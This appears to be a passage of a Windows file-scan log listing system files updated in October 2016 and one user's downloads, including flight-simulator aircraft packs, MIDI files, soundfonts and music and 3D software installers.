2016-10-13 15:28 - 2016-10-05 03:12 - 00619368 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cng.sys

2016-10-13 15:28 - 2016-10-05 03:09 - 22219328 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll

2016-10-13 15:28 - 2016-10-05 03:09 - 00064352 _____ (Avago Technologies) C:\WINDOWS\system32\Drivers\MegaSas2i.sys

2016-10-13 15:28 - 2016-10-05 03:03 - 01705976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll

2016-10-13 15:28 - 2016-10-05 02:51 - 01430720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.dll

2016-10-13 15:28 - 2016-10-05 02:50 - 02256592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll

2016-10-13 15:28 - 2016-10-05 02:46 - 03892352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfcore.dll

2016-10-13 15:28 - 2016-10-05 02:46 - 00980824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfnetcore.dll

2016-10-13 15:28 - 2016-10-05 02:45 - 20965240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll

2016-10-13 15:28 - 2016-10-05 02:44 - 22568960 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll

2016-10-13 15:28 - 2016-10-05 02:41 - 00545944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontdrvhost.exe

2016-10-13 15:28 - 2016-10-05 02:38 - 00584192 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIRibbonRes.dll

2016-10-13 15:28 - 2016-10-05 02:38 - 00237568 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Web.Diagnostics.dll

2016-10-13 15:28 - 2016-10-05 02:36 - 00113664 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.ServiceDiscovery.Dnssd.dll

2016-10-13 15:28 - 2016-10-05 02:35 - 00327680 _____ C:\WINDOWS\system32\wc_storage.dll

2016-10-13 15:28 - 2016-10-05 02:35 - 00196096 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDeviceRegistration.dll

2016-10-13 15:28 - 2016-10-05 02:35 - 00101888 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDeviceRegistration.Ngc.dll

2016-10-13 15:28 - 2016-10-05 02:34 - 00463360 _____ (Microsoft Corporation) C:\WINDOWS\system32\daxexec.dll

2016-10-13 15:28 - 2016-10-05 02:33 - 00651264 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.AllJoyn.dll

2016-10-13 15:28 - 2016-10-05 02:33 - 00296960 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsensorgroup.dll

2016-10-13 15:28 - 2016-10-05 02:33 - 00268800 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserMgrProxy.dll

2016-10-13 15:28 - 2016-10-05 02:33 - 00157696 _____ (Microsoft Corporation) C:\WINDOWS\system32\credprovs.dll

2016-10-13 15:28 - 2016-10-05 02:32 - 00590336 _____ (Microsoft Corporation) C:\WINDOWS\system32\efswrt.dll

2016-10-13 15:28 - 2016-10-05 02:32 - 00379904 _____ (Microsoft Corporation) C:\WINDOWS\system32\apprepsync.dll

2016-10-13 15:28 - 2016-10-05 02:32 - 00146432 _____ (Microsoft Corporation) C:\WINDOWS\system32\AuthBroker.dll

2016-10-13 15:28 - 2016-10-05 02:31 - 00837632 _____ (Microsoft Corporation) C:\WINDOWS\system32\wbiosrvc.dll

2016-10-13 15:28 - 2016-10-05 02:31 - 00561664 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Wallet.dll

2016-10-13 15:28 - 2016-10-05 02:31 - 00480768 _____ (Microsoft Corporation) C:\WINDOWS\system32\dsreg.dll

2016-10-13 15:28 - 2016-10-05 02:31 - 00425472 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcdedit.exe

2016-10-13 15:28 - 2016-10-05 02:30 - 00396800 _____ (Microsoft Corporation) C:\WINDOWS\system32\ncsi.dll

2016-10-13 15:28 - 2016-10-05 02:29 - 00956416 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll

2016-10-13 15:28 - 2016-10-05 02:29 - 00368640 _____ (Microsoft Corporation) C:\WINDOWS\system32\nlasvc.dll

2016-10-13 15:28 - 2016-10-05 02:28 - 00584192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIRibbonRes.dll

2016-10-13 15:28 - 2016-10-05 02:28 - 00156672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDeviceRegistration.dll

2016-10-13 15:28 - 2016-10-05 02:27 - 00945664 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcWebFilter.dll

2016-10-13 15:28 - 2016-10-05 02:27 - 00094208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.StateRepositoryClient.dll

2016-10-13 15:28 - 2016-10-05 02:26 - 23680512 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll

2016-10-13 15:28 - 2016-10-05 02:26 - 00590848 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll

2016-10-13 15:28 - 2016-10-05 02:26 - 00327680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\daxexec.dll

2016-10-13 15:28 - 2016-10-05 02:26 - 00184320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserMgrProxy.dll

2016-10-13 15:28 - 2016-10-05 02:26 - 00137216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\credprovs.dll

2016-10-13 15:28 - 2016-10-05 02:26 - 00088576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDeviceRegistration.Ngc.dll

2016-10-13 15:28 - 2016-10-05 02:25 - 01589248 _____ (Microsoft Corporation) C:\WINDOWS\system32\msdtctm.dll

2016-10-13 15:28 - 2016-10-05 02:25 - 00822784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakradiag.dll

2016-10-13 15:28 - 2016-10-05 02:25 - 00404992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dsreg.dll

2016-10-13 15:28 - 2016-10-05 02:25 - 00299520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataAccountApis.dll

2016-10-13 15:28 - 2016-10-05 02:25 - 00117760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AuthBroker.dll

2016-10-13 15:28 - 2016-10-05 02:24 - 13434368 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmp.dll

2016-10-13 15:28 - 2016-10-05 02:24 - 00483840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.AllJoyn.dll

2016-10-13 15:28 - 2016-10-05 02:24 - 00099328 _____ (Microsoft Corporation) C:\WINDOWS\system32\adsmsext.dll

2016-10-13 15:28 - 2016-10-05 02:23 - 00431616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\efswrt.dll

2016-10-13 15:28 - 2016-10-05 02:23 - 00426496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Wallet.dll

2016-10-13 15:28 - 2016-10-05 02:23 - 00284672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\apprepsync.dll

2016-10-13 15:28 - 2016-10-05 02:23 - 00187904 _____ (Microsoft Corporation) C:\WINDOWS\system32\dialclient.dll

2016-10-13 15:28 - 2016-10-05 02:23 - 00125952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\apprepapi.dll

2016-10-13 15:28 - 2016-10-05 02:22 - 13081088 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll

2016-10-13 15:28 - 2016-10-05 02:21 - 08075264 _____ (Microsoft Corporation) C:\WINDOWS\system32\mstscax.dll

2016-10-13 15:28 - 2016-10-05 02:21 - 03689984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msi.dll

2016-10-13 15:28 - 2016-10-05 02:21 - 01364992 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpncore.dll

2016-10-13 15:28 - 2016-10-05 02:21 - 00567808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ChatApis.dll

2016-10-13 15:28 - 2016-10-05 02:20 - 00804864 _____ (Microsoft Corporation) C:\WINDOWS\system32\FrameServer.dll

2016-10-13 15:28 - 2016-10-05 02:20 - 00661504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WpcWebFilter.dll

2016-10-13 15:28 - 2016-10-05 02:20 - 00143872 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxdav.sys

2016-10-13 15:28 - 2016-10-05 02:19 - 02390016 _____ (Microsoft Corporation) C:\WINDOWS\system32\smartscreen.exe

2016-10-13 15:28 - 2016-10-05 02:19 - 02265088 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll

2016-10-13 15:28 - 2016-10-05 02:19 - 01690112 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll

2016-10-13 15:28 - 2016-10-05 02:19 - 00982528 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcomm.dll

2016-10-13 15:28 - 2016-10-05 02:18 - 04612608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.dll

2016-10-13 15:28 - 2016-10-05 02:18 - 00983040 _____ (Microsoft Corporation) C:\WINDOWS\system32\ngcsvc.dll

2016-10-13 15:28 - 2016-10-05 02:18 - 00911872 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.dll

2016-10-13 15:28 - 2016-10-05 02:18 - 00858112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\EmailApis.dll

2016-10-13 15:28 - 2016-10-05 02:18 - 00759296 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll

2016-10-13 15:28 - 2016-10-05 02:17 - 08126464 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll

2016-10-13 15:28 - 2016-10-05 02:17 - 02914304 _____ (Microsoft Corporation) C:\WINDOWS\system32\CertEnroll.dll

2016-10-13 15:28 - 2016-10-05 02:17 - 01493504 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll

2016-10-13 15:28 - 2016-10-05 02:16 - 19418624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll

2016-10-13 15:28 - 2016-10-05 02:16 - 04747776 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll

2016-10-13 15:28 - 2016-10-05 02:16 - 00765440 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Sensors.dll

2016-10-13 15:28 - 2016-10-05 02:16 - 00508416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll

2016-10-13 15:28 - 2016-10-05 02:15 - 07625728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll

2016-10-13 15:28 - 2016-10-05 02:15 - 02800128 _____ (Microsoft Corporation) C:\WINDOWS\system32\netshell.dll

2016-10-13 15:28 - 2016-10-05 02:15 - 01980416 _____ (Microsoft Corporation) C:\WINDOWS\system32\diagtrack.dll

2016-10-13 15:28 - 2016-10-05 02:15 - 01509376 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys

2016-10-13 15:28 - 2016-10-05 02:15 - 00774656 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Web.dll

2016-10-13 15:28 - 2016-10-05 02:15 - 00141312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dialclient.dll

2016-10-13 15:28 - 2016-10-05 02:14 - 19416576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll

2016-10-13 15:28 - 2016-10-05 02:14 - 02688512 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Logon.dll

2016-10-13 15:28 - 2016-10-05 02:14 - 02667520 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll

2016-10-13 15:28 - 2016-10-05 02:14 - 02476544 _____ (Microsoft Corporation) C:\WINDOWS\system32\DWrite.dll

2016-10-13 15:28 - 2016-10-05 02:14 - 01778176 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll

2016-10-13 15:28 - 2016-10-05 02:14 - 01255936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AzureSettingSyncProvider.dll

2016-10-13 15:28 - 2016-10-05 02:14 - 00909312 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Search.dll

2016-10-13 15:28 - 2016-10-05 02:13 - 12345856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wmp.dll

2016-10-13 15:28 - 2016-10-05 02:13 - 01328128 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Web.Http.dll

2016-10-13 15:28 - 2016-10-05 02:13 - 00055808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\offreg.dll

2016-10-13 15:28 - 2016-10-05 02:12 - 01107456 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadtb.dll

2016-10-13 15:28 - 2016-10-05 02:12 - 00998912 _____ (Microsoft Corporation) C:\WINDOWS\system32\TSWorkspace.dll

2016-10-13 15:28 - 2016-10-05 02:12 - 00924672 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.BackgroundTransfer.dll

2016-10-13 15:28 - 2016-10-05 02:11 - 12174848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll

2016-10-13 15:28 - 2016-10-05 02:11 - 06108672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mos.dll

2016-10-13 15:28 - 2016-10-05 02:11 - 06043136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll

2016-10-13 15:28 - 2016-10-05 02:11 - 00640000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MCRecvSrc.dll

2016-10-13 15:28 - 2016-10-05 02:10 - 06474752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mspaint.exe

2016-10-13 15:28 - 2016-10-05 02:09 - 07467520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstscax.dll

2016-10-13 15:28 - 2016-10-05 02:09 - 03369984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.StateRepository.dll

2016-10-13 15:28 - 2016-10-05 02:09 - 00884224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcomm.dll

2016-10-13 15:28 - 2016-10-05 02:09 - 00710144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppointmentApis.dll

2016-10-13 15:28 - 2016-10-05 02:09 - 00691712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll

2016-10-13 15:28 - 2016-10-05 02:08 - 00873472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aadtb.dll

2016-10-13 15:28 - 2016-10-05 02:07 - 03667456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll

2016-10-13 15:28 - 2016-10-05 02:07 - 02682880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\netshell.dll

2016-10-13 15:28 - 2016-10-05 02:07 - 02646016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CertEnroll.dll

2016-10-13 15:28 - 2016-10-05 02:07 - 00566784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ShareHost.dll

2016-10-13 15:28 - 2016-10-05 02:06 - 02999296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys

2016-10-13 15:28 - 2016-10-05 02:06 - 02254336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll

2016-10-13 15:28 - 2016-10-05 02:06 - 02005504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DWrite.dll

2016-10-13 15:28 - 2016-10-05 02:06 - 01880576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Logon.dll

2016-10-13 15:28 - 2016-10-05 02:06 - 01594368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll

2016-10-13 15:28 - 2016-10-05 02:06 - 00850944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ContactApis.dll

2016-10-13 15:28 - 2016-10-05 02:06 - 00711680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Search.dll

2016-10-13 15:28 - 2016-10-05 02:05 - 03105792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstsc.exe

2016-10-13 15:28 - 2016-10-05 02:05 - 00751104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.BackgroundTransfer.dll

2016-10-13 15:28 - 2016-09-06 22:34 - 00360040 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettingsAdminFlows.exe

2016-10-13 15:27 - 2016-10-05 03:35 - 00279904 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\sdbus.sys

2016-10-13 15:27 - 2016-10-05 03:33 - 00128864 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tm.sys

2016-10-13 15:27 - 2016-10-05 03:30 - 07812448 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe

2016-10-13 15:27 - 2016-10-05 03:22 - 01181536 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ndis.sys

2016-10-13 15:27 - 2016-10-05 03:16 - 00187232 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dumpsd.sys

2016-10-13 15:27 - 2016-10-05 03:12 - 01112928 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxPackaging.dll

2016-10-13 15:27 - 2016-10-05 03:09 - 04129928 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfcore.dll

2016-10-13 15:27 - 2016-10-05 03:09 - 01071728 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfnetcore.dll

2016-10-13 15:27 - 2016-10-05 03:09 - 00244816 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfps.dll

2016-10-13 15:27 - 2016-10-05 03:08 - 00241504 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHost.dll

2016-10-13 15:27 - 2016-10-05 03:04 - 02537824 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tcpip.sys

2016-10-13 15:27 - 2016-10-05 03:04 - 00628032 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontdrvhost.exe

2016-10-13 15:27 - 2016-10-05 02:50 - 00116576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudExperienceHostCommon.dll

2016-10-13 15:27 - 2016-10-05 02:49 - 01980768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxml6.dll

2016-10-13 15:27 - 2016-10-05 02:48 - 01022304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxPackaging.dll

2016-10-13 15:27 - 2016-10-05 02:46 - 01360456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfnetsrc.dll

2016-10-13 15:27 - 2016-10-05 02:36 - 00128512 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthpan.sys

2016-10-13 15:27 - 2016-10-05 02:36 - 00073216 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepositoryBroker.dll

2016-10-13 15:27 - 2016-10-05 02:35 - 00352768 _____ (Microsoft Corporation) C:\WINDOWS\system32\cloudAP.dll

2016-10-13 15:27 - 2016-10-05 02:35 - 00122880 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepositoryClient.dll

2016-10-13 15:27 - 2016-10-05 02:34 - 00144896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dfsc.sys

2016-10-13 15:27 - 2016-10-05 02:32 - 00223744 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.HostName.dll

2016-10-13 15:27 - 2016-10-05 02:31 - 00748544 _____ (Microsoft Corporation) C:\WINDOWS\system32\ChatApis.dll

2016-10-13 15:27 - 2016-10-05 02:31 - 00176128 _____ (Microsoft Corporation) C:\WINDOWS\system32\apprepapi.dll

2016-10-13 15:27 - 2016-10-05 02:31 - 00058880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ConfigureExpandedStorage.dll

2016-10-13 15:27 - 2016-10-05 02:29 - 09129984 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll

2016-10-13 15:27 - 2016-10-05 02:29 - 06285312 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.dll

2016-10-13 15:27 - 2016-10-05 02:29 - 01145856 _____ (Microsoft Corporation) C:\WINDOWS\system32\EmailApis.dll

2016-10-13 15:27 - 2016-10-05 02:28 - 03059200 _____ (Microsoft Corporation) C:\WINDOWS\system32\msi.dll

2016-10-13 15:27 - 2016-10-05 02:28 - 00775168 _____ (Microsoft Corporation) C:\WINDOWS\system32\GamePanel.exe

2016-10-13 15:27 - 2016-10-05 02:28 - 00406016 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentClient.dll

2016-10-13 15:27 - 2016-10-05 02:28 - 00123904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.HostName.dll

2016-10-13 15:27 - 2016-10-05 02:27 - 00087040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.ServiceDiscovery.Dnssd.dll

2016-10-13 15:27 - 2016-10-05 02:26 - 00182784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsensorgroup.dll

2016-10-13 15:27 - 2016-10-05 02:23 - 01908224 _____ (Microsoft Corporation) C:\WINDOWS\system32\AzureSettingSyncProvider.dll

2016-10-13 15:27 - 2016-10-05 02:22 - 07654912 _____ (Microsoft Corporation) C:\WINDOWS\system32\mos.dll

2016-10-13 15:27 - 2016-10-05 02:22 - 04749312 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_nt.dll

2016-10-13 15:27 - 2016-10-05 02:22 - 00073216 _____ (Microsoft Corporation) C:\WINDOWS\system32\offreg.dll

2016-10-13 15:27 - 2016-10-05 02:21 - 00310272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppXDeploymentClient.dll

2016-10-13 15:27 - 2016-10-05 02:21 - 00167936 _____ (Microsoft Corporation) C:\WINDOWS\system32\ErrorDetails.dll

2016-10-13 15:27 - 2016-10-05 02:20 - 00936960 _____ (Microsoft Corporation) C:\WINDOWS\system32\MCRecvSrc.dll

2016-10-13 15:27 - 2016-10-05 02:18 - 01656832 _____ (Microsoft Corporation) C:\WINDOWS\system32\GdiPlus.dll

2016-10-13 15:27 - 2016-10-05 02:17 - 04136960 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepository.dll

2016-10-13 15:27 - 2016-10-05 02:17 - 00089088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\adsmsext.dll

2016-10-13 15:27 - 2016-10-05 02:16 - 06664192 _____ (Microsoft Corporation) C:\WINDOWS\system32\mspaint.exe

2016-10-13 15:27 - 2016-10-05 02:16 - 00771072 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppointmentApis.dll

2016-10-13 15:27 - 2016-10-05 02:15 - 03617792 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys

2016-10-13 15:27 - 2016-10-05 02:15 - 01840640 _____ (Microsoft Corporation) C:\WINDOWS\system32\FntCache.dll

2016-10-13 15:27 - 2016-10-05 02:15 - 00833024 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32spl.dll

2016-10-13 15:27 - 2016-10-05 02:15 - 00716800 _____ (Microsoft Corporation) C:\WINDOWS\system32\ShareHost.dll

2016-10-13 15:27 - 2016-10-05 02:14 - 01456640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\GdiPlus.dll

2016-10-13 15:27 - 2016-10-05 02:14 - 01013760 _____ (Microsoft Corporation) C:\WINDOWS\system32\ContactApis.dll

2016-10-13 15:27 - 2016-10-05 02:14 - 00701952 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.Connectivity.dll

2016-10-13 15:27 - 2016-10-05 02:11 - 03496960 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVidCtl.dll

2016-10-13 15:27 - 2016-10-05 02:09 - 00674304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.dll

2016-10-13 15:27 - 2016-10-05 02:08 - 02356736 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSVidCtl.dll

2016-10-13 15:27 - 2016-10-05 02:08 - 00598528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Web.dll

2016-10-13 15:27 - 2016-10-05 02:07 - 00589312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Sensors.dll

2016-10-13 15:27 - 2016-10-05 02:07 - 00542208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.Connectivity.dll

2016-10-13 15:27 - 2016-10-05 02:06 - 01013248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Web.Http.dll

2016-10-13 15:27 - 2016-10-04 17:01 - 00446124 _____ C:\WINDOWS\system32\ApnDatabase.xml

2016-10-13 15:08 - 2016-10-13 15:27 - 74538332 _____ C:\Users\Kyle Aniel\Downloads\ready_for_pushback_boeing_747-200v2_fs2004.zip

2016-10-11 21:35 - 2016-10-11 22:09 - 101448493 _____ C:\Users\Kyle Aniel\Downloads\MD-8x.rar

2016-10-11 21:17 - 2016-10-11 21:17 - 23402545 _____ (Markus Schwenk) C:\Users\Kyle Aniel\Downloads\MidiEditor-3.0.0-Setup.exe

2016-10-11 14:24 - 2016-10-11 14:24 - 00000000 ____D C:\Users\Kyle Aniel\Documents\test

2016-10-11 14:08 - 2016-10-11 14:42 - 63307776 _____ C:\Users\Kyle Aniel\Downloads\Fsx - md 80.rar

2016-10-11 14:08 - 2016-10-11 14:08 - 00019924 _____ C:\Users\Kyle Aniel\Downloads\f-s-x-flight-1-super-md-80.torrent

2016-10-10 21:33 - 2016-10-10 21:33 - 00155346 _____ C:\Users\Kyle Aniel\Downloads\1476160139_J0OdkDfEzHBASpqKICO9_tr.mid

2016-10-10 21:33 - 2016-10-10 21:33 - 00155346 _____ C:\Users\Kyle Aniel\Downloads\1476160139_J0OdkDfEzHBASpqKICO9_tr (1).mid

2016-10-10 21:21 - 2016-10-10 21:22 - 116153496 _____ C:\Users\Kyle Aniel\Downloads\Orchestra Soundfont 2 COMBO.sf2

2016-10-10 21:14 - 2016-10-10 21:15 - 148358590 _____ C:\Users\Kyle Aniel\Downloads\FluidR3_GM.sf2

2016-10-10 21:10 - 2016-10-10 21:14 - 75148691 _____ C:\Users\Kyle Aniel\Downloads\FluidR3_GM.sfArk

2016-10-10 21:08 - 2016-10-10 21:08 - 12189088 _____ C:\Users\Kyle Aniel\Downloads\Chaos_V20.sf2

2016-10-10 21:06 - 2016-10-18 19:38 - 00001977 _____ C:\Users\banie_000\Desktop\SynthFont.lnk

2016-10-10 21:06 - 2016-10-10 21:07 - 00000000 ____D C:\Users\banie_000\AppData\Roaming\SynthFont

2016-10-10 21:06 - 2016-10-10 21:06 - 07479100 _____ (Kenneth Rundt) C:\Users\Kyle Aniel\Downloads\SynthFontSetup.exe

2016-10-10 21:06 - 2016-10-10 21:06 - 00000000 ____D C:\Users\banie_000\Documents\SynthFont

2016-10-10 21:06 - 2016-10-10 21:06 - 00000000 ____D C:\Users\banie_000\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SynthFont

2016-10-10 21:06 - 2016-10-10 21:06 - 00000000 ____D C:\Program Files (x86)\SynthFont

2016-10-10 21:04 - 2016-10-10 21:05 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\SFPACK

2016-10-10 21:04 - 2016-10-10 21:04 - 00000752 _____ C:\Users\Kyle Aniel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SFPack.lnk

2016-10-10 21:03 - 2016-10-10 21:03 - 06823140 _____ C:\Users\Kyle Aniel\Downloads\Chaos_V20.sfArk

2016-10-10 21:03 - 2016-10-10 21:03 - 00110774 _____ C:\Users\Kyle Aniel\Downloads\SFPACK.zip

2016-10-10 20:51 - 2016-10-11 21:23 - 00178744 _____ C:\Users\Kyle Aniel\Downloads\25287_Rhapsody-in-Blue.mid

2016-10-09 22:54 - 2016-10-09 22:54 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\sas_md81

2016-10-09 22:27 - 2016-10-09 22:51 - 73172380 _____ C:\Users\Kyle Aniel\Downloads\sas_md81.zip

2016-10-09 22:11 - 2016-10-09 22:11 - 00000000 ____D C:\Users\Kyle Aniel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Blender

2016-10-09 22:10 - 2016-10-09 22:10 - 00000000 ____D C:\Program Files\Blender Foundation

2016-10-09 22:08 - 2016-10-09 22:59 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\md80-88_pack_v2

2016-10-09 22:08 - 2016-10-09 22:09 - 89464832 _____ C:\Users\Kyle Aniel\Downloads\blender-2.78-windows64.msi

2016-10-09 22:05 - 2016-10-09 22:07 - 86701411 _____ C:\Users\Kyle Aniel\Downloads\md80-88_pack_v2.zip

2016-10-09 17:02 - 2016-10-09 17:02 - 00015413 _____ C:\Users\Kyle Aniel\Downloads\c-l-s-m-d82-jet-liner.torrent

2016-10-09 16:32 - 2016-10-09 16:34 - 146373100 _____ C:\Users\Kyle Aniel\Downloads\CLS MD 81.rar

